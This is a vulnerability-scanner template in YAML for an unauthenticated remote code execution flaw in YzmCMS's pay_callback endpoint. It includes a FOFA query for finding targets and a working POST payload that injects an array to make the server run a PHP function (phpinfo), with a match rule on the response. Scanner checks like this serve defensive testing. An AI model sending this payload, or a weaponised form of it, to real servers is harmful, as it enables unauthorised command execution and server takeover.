id: YzmCMS-pay_callback-RCE

info:
  name: YzmCMS pay_callback 远程命令执行漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: app="yzmcms"
    YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统指令，写入后门文件，最终可获取服务器权限。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/140112191
  tags: RCE
  

rules:
  r0:
    request:
      method: POST
      path: /pay/index/pay_callback.html
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
    expression: response.status == 200 && response.body.bcontains(b'phpinfo()') && response.body.bcontains(b'PHP Version')

expression: r0() 
